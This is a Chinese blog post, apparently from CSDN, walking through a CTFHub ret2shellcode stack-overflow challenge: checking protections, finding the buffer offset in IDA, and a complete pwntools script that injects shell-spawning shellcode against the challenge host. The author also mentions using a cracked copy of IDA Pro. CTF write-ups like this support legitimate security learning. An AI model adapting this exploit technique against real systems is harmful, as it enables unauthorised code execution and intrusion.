• ret2shellcode


    一、栈溢出?

    在栈溢出的攻击技术中通常是要控制函数的返回地址到特定位置执行自己想要执行的代码。

    二、解题过程

    1.开启题目,下载附件,使用file查看文件类型

    在这里插入图片描述查看安全措施 CANARY/FORTIFY/NX/PIE 基本都关闭了
    在这里插入图片描述

    是一个64位的elf文件,添加可执行权限
    在这里插入图片描述
    运行一下看看,可以看到题目生成一个地址,并且需要在Input someting 后面输入payload

    在这里插入图片描述

    2.IDA反编译

    (ps:IDA在linux环境中太难配置了,我的方法是在windows环境下,开一台虚拟机,然后在windows里下载破解版ida pro,在linux虚拟机里做题)
    老规矩,放到IDA里看一下:
    在这里插入图片描述在这里插入图片描述
    __int64 buf; // [rsp+0h] [rbp-10h] 可以知道buf相对于rbp的偏移为0x10
    所以其可用的shellcode空间为16+8=24字节(偏移量+返回地址),我们有长度为23的shellcode,但是因为其本身是有push指令的,如果我们把shellcode放在返回地址的前面,在程序leave的时候会破坏shellcode,所以我们将其放在后面,即payload的格式为:

    bytes('a',encoding="utf8")*24+[buf_addr+32]+shellcode
    
    
    • 1
    • 2

    这里的32是24字节的填充数据+返回地址

    3.代码

    from pwn import *
    
    context(os="linux", arch="amd64", log_level='debug')
    host = 'challenge-b5fd6fdf00912e7a.sandbox.ctfhub.com'
    port = 33363
    
    p = process('./pwn')
    p = connect(host,port)
    p.recvuntil(b'[')
    buf_addr = int(p.recvuntil(b']')[:-1].decode('utf-8'), 16) # 获取buf地址
    shellcode_address = buf_addr+0x20
    p.recv() 
    shell= asm(shellcraft.sh())
    p.sendline( b'a'*24 + p64(shellcode_address) + shell)
    p.interactive()
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16

    在这里插入图片描述


    总结

    基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。

  • 相关阅读:
    中英文域名,你是否也有点小迷糊......
    VUE 组合式API
    SVA介绍
    MySQL索引事务
    Dubbo——通信框架与通信协议(dubbo协议)原理
    docker 镜像打包发布
    Redis原理:动态字符串SDS
    C++ Reference: Standard C++ Library reference: Containers: array: array
    [GYCTF2020]Ez_Express
    如何释放服务器内存
  • 原文地址:https://blog.csdn.net/weixin_56301399/article/details/125895537